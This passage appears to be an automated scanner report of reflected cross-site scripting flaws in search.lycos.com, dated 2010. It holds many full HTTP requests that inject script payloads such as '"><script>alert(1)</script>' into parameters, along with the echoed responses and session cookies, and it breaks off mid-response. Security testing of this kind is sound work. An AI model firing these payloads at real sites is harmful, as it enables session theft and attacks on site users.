GET /?tab=multi&cat=images2b88f"%3balert(1)//ab61ce09937 HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:35:04 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:04 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17530
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <!-- var cm_host = "multimedia.lycos.com"; var cm_taxid = "/results_images2b88f";alert(1)//ab61ce09937"; //--> ...[SNIP]...
The value of the mobile request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8ead"><script>alert(1)</script>b7a2c77f357 was submitted in the mobile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?tab=people&mobile=d8ead"><script>alert(1)</script>b7a2c77f357 HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:35:04 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:04 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17232
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://search.lycos.com/?tab=people&mobile=d8ead"><script>alert(1)</script>b7a2c77f357&mobile=1"> ...[SNIP]...
3.126. http://search.lycos.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://search.lycos.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca07a"><script>alert(1)</script>4cdc20754fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?tab=web&query=%27&x=0&y=0&ca07a"><script>alert(1)</script>4cdc20754fc=1 HTTP/1.1 Host: search.lycos.com Proxy-Connection: keep-alive Referer: http://www.lycos.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163893857460; __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.4.10.1292163855
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:29:33 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:33 GMT; path=/ Set-Cookie: LYCOS_SEARCH=i4ndl3gvfld9s3lgl65ehmk080; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19255
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search Resu ...[SNIP]... <a href="http://search.lycos.com/?tab=web&query=%27&x=0&y=0&ca07a"><script>alert(1)</script>4cdc20754fc=1&mobile=1"> ...[SNIP]...
The value of the query request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd8f5"><script>alert(1)</script>616be4478a0 was submitted in the query parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?tab=web&query=%27bd8f5"><script>alert(1)</script>616be4478a0&x=0&y=0 HTTP/1.1
Host: search.lycos.com
Proxy-Connection: keep-alive
Referer: http://www.lycos.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163893857460; __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.4.10.1292163855
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:12 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:12 GMT; path=/
Set-Cookie: LYCOS_SEARCH=p6laldmb2g7ohngk9ohi37mec0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46867
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search Resu ...[SNIP]... <a href="http://search.lycos.com/?tab=web&query=%27bd8f5"><script>alert(1)</script>616be4478a0&x=0&y=0&mobile=1"> ...[SNIP]...
The value of the query request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34964"%3balert(1)//0334fee274d was submitted in the query parameter. This input was echoed as 34964";alert(1)//0334fee274d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?tab=web&query=%2734964"%3balert(1)//0334fee274d&x=0&y=0&mobile=1 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:12 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=1; expires=Mon, 12-Dec-2011 14:35:12 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 12560
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bf21"><script>alert(1)</script>170bf3715a3 was submitted in the src parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?src=LYCOS502bf21"><script>alert(1)</script>170bf3715a3&query= HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:03 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PARTNER=lycos502bf21%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E170bf3715a3
Set-Cookie: PARTNER=deleted; expires=Sat, 12-Dec-2009 14:35:02 GMT
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17596
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://search.lycos.com/?src=LYCOS502bf21"><script>alert(1)</script>170bf3715a3&query=&mobile=1"> ...[SNIP]...
The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 714e4"><script>alert(1)</script>1c8e17eea03 was submitted in the tab parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?tab=web714e4"><script>alert(1)</script>1c8e17eea03&query=%27&x=0&y=0 HTTP/1.1
Host: search.lycos.com
Proxy-Connection: keep-alive
Referer: http://www.lycos.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163893857460; __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.4.10.1292163855
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:07 GMT; path=/
Set-Cookie: LYCOS_SEARCH=0roaos6kqiohp2a9qr66pi4uc3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19414
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search Resu ...[SNIP]... <a href="http://mail.lycos.com/?utm_source=lycostab_web714e4"><script>alert(1)</script>1c8e17eea03&utm_campaign=home_mail&utm_medium=networkbar"> ...[SNIP]...
The value of the x request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdb19"><script>alert(1)</script>384854fefb5 was submitted in the x parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?tab=web&query=%27&x=0fdb19"><script>alert(1)</script>384854fefb5&y=0 HTTP/1.1
Host: search.lycos.com
Proxy-Connection: keep-alive
Referer: http://www.lycos.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163893857460; __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.4.10.1292163855
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:17 GMT; path=/
Set-Cookie: LYCOS_SEARCH=3nnouoedqulhb6jgumc9falmu4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19245
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search Resu ...[SNIP]... <a href="http://search.lycos.com/?tab=web&query=%27&x=0fdb19"><script>alert(1)</script>384854fefb5&y=0&mobile=1"> ...[SNIP]...
The value of the y request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 427d8"><script>alert(1)</script>ca48fe7296 was submitted in the y parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?tab=web&query=%27&x=0&y=0427d8"><script>alert(1)</script>ca48fe7296 HTTP/1.1
Host: search.lycos.com
Proxy-Connection: keep-alive
Referer: http://www.lycos.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163893857460; __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.4.10.1292163855
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:19 GMT; path=/
Set-Cookie: LYCOS_SEARCH=opld2sr244q0u26cc1hfeg7cj7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19243
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search Resu ...[SNIP]... <a href="http://search.lycos.com/?tab=web&query=%27&x=0&y=0427d8"><script>alert(1)</script>ca48fe7296&mobile=1"> ...[SNIP]...
The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8d10"><script>alert(1)</script>11d3b1192c5 was submitted in the cat parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /image/?tab=multi&cat=imagesb8d10"><script>alert(1)</script>11d3b1192c5 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:05 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17597
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://mail.lycos.com/?utm_source=lycostab_imagesb8d10"><script>alert(1)</script>11d3b1192c5&utm_campaign=home_mail&utm_medium=networkbar"> ...[SNIP]...
The value of the cat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67115"%3balert(1)//4e88d6bcb17 was submitted in the cat parameter. This input was echoed as 67115";alert(1)//4e88d6bcb17 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /image/?tab=multi&cat=images67115"%3balert(1)//4e88d6bcb17 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:05 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17524
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <!-- var cm_host = "multimedia.lycos.com"; var cm_taxid = "/results_images67115";alert(1)//4e88d6bcb17"; //--> ...[SNIP]...
3.135. http://search.lycos.com/image/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://search.lycos.com
Path:
/image/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acc05"><script>alert(1)</script>f6d897429 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /image/?acc05"><script>alert(1)</script>f6d897429=1 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:13 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17370
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://search.lycos.com/?acc05"><script>alert(1)</script>f6d897429=1&mobile=1"> ...[SNIP]...
The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaf1c"><script>alert(1)</script>be82f60f06e was submitted in the tab parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /image/?tab=multiaaf1c"><script>alert(1)</script>be82f60f06e&cat=images HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:03 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17300
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://mail.lycos.com/?utm_source=lycostab_multiaaf1c"><script>alert(1)</script>be82f60f06e&utm_campaign=home_mail&utm_medium=networkbar"> ...[SNIP]...
The value of the cat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50828"%3balert(1)//3e5bc5531b2 was submitted in the cat parameter. This input was echoed as 50828";alert(1)//3e5bc5531b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/?tab=multi&cat=video50828"%3balert(1)//3e5bc5531b2 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:07 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
